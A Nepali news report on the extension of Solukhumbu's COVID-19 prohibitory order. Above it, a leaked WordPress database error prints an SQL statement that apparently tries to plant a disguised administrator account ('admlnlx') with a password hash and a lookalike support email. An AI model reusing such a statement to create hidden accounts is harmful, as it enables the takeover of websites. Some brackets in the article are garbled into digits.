WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BY8zAfJkoxzsDmUZZykMj/UxcUeTx50', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 12:10:24', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । विश्वभरि फैलिएको महामारी कोरोनाको कारण सोलुखुम्बुमा गत बैशाख २६ गते रातीबाट जारी गरिएको निषेधाज्ञाको अवधि आईतबार राती १२ बजे सकिदै छ । जिल्लालाई कोरोना संक्रमण फैलिनबाट जोगाउन १५ दिनका लागी गरिएको निषेधाज्ञाको अवधी आईतबार राती १२ बजे सकिने जिल्ला प्रशासन कार्यालय सोलुखुम्बुले जनाएको छ ।
यद्यपी जिल्लामा संक्रमणदर तिब्र रुपमा बढ्दै गएकाले निषेधाज्ञा पुन थप गरिने प्रमुख जिल्ला अधिकारी ९सिडिओ० गणेश विक्रम शाहीले बताए । भिड तथा जमघटबाट नै संक्रमण फैलिने भएकाले त्यसलाई रोक्न १५ दिन गरिएको निषेधाज्ञा प्रयाप्त नभएकाले पुन थप गरिने सिडिओ शाहीको भनाई छ ।
निषेधाज्ञा कति दिनको लागि बढाउने आजआईतबार डिसिसिएमसीको भर्चुअल बैठक बसेर समय अवधि निर्धारण गरिने जिल्ला प्रशासन कार्यालय सोलुखुम्बुले जनाएको छ । स्थानीय प्रशासन ऐन २०२८ को दफा ६ को उपदफा ९३० र सङ्क्रामक रोग ऐन २०२० को दफा ९२० बमोजिम निषेधाज्ञा जारी गरिएको जिल्ला प्रशासन कार्यालय सोलुखुम्बुले जनाएको छ । निषेधाज्ञामा अति आवश्यकबाहेक अन्य काम गर्न पाइने छैन ।